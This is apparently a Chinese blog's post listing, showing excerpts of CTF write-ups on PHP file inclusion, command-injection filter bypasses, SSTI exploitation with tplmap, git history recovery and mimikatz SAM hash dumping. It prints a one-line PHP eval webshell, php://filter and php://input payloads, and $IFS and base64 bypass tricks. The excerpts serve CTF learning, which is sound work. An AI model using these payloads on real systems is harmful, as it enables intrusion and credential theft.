- 博客(11)
- 收藏
- 关注
RSS订阅原创 ctf 文件包含
一、eval() 函数一句话木马<?php eval($_post[0]);?>eval()函数作用:将函数内的字符串当作代码来执行使用蚁剑连接一句话木马,需要输入密码,密码值为post[]中的值。二、通过php://filter获取flag?php://filter/read=convert.base64-encode/resouce=flag.php三、通过php://input获取shell?php://input在hackbar的post里写入<
2023-03-28 22:24:10
244
原创 命令执行漏洞bypass
$IFS$IFS$1$IFS$9${IFS}{ls, -al}<<>%20%09cmd=$'\x20test.txt'&&cat$cmd二、命令分隔符绕过%0a%0d;&&&|||三、敏感词汇绕过(1)拼接: a=l;b=s;$a$b //拼接成ls(2)base64绕过: `echo 'Y2F0Cg==' | base64 -d` test.tx
2023-03-15 11:48:47
299
原创 联合执行符号速记
cmd1将首先运行,不管cmd1运行成功还是出现错误,cmd2都会在它之后运行,当cmd2命令完成时,cmd3将会运行。有时候希望确保Linux命令中,只有在前一个命令成功结束时,下一个命令才会运行。这就是逻辑和运算符&&出现的地方。可以使用逻辑与操作符(||)运行命令行,但是只有在前一个命令出现错误时才运行下一个命令。如果cmd1运行失败,则运行cmd2。如果cmd2运行成功,cmd3将不会运行。当第一个命令出现错误时,&&分隔的命令会停止执行后面的命令。前一个命令的结果作为后一个命令的参数。
2023-03-14 22:34:03
255
原创 bugku之source
进行base 64解码发现解码失败,所以这个flag是假的。输入命令git reflog 显示可引用的历史flag记录。然后使用git show命令挨个查看,最后得到flag。输入命令wget -r 将git下载下来。打开kali,用dirb进行目录扫描。
2023-03-14 14:17:05
282
原创 SSTI注入
输入python tplmap.py -u 'http://114.67.175.224:18426/?获取到shell后输入命令ls查看当前目录下文件,发现flag。输入命令cat flag取得flag文件。用tplmap自动注入。
2023-03-14 13:03:11
66
原创 mimikatz实战之bugku简单取证1
Hash NTLM:5f9469a1db6c8f0dfd98af5c0768e0cd 为我们需要的密码。输入 lsadump::sam /sam:sam /system:system。所以flag{administrator-QQAAzz_forensics}判断可能考察取证,下载mimikatz(使用时记得关闭所有防病毒软件)发现与 Windows用户根目录下文件很类似。
2023-03-13 23:01:18
427
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人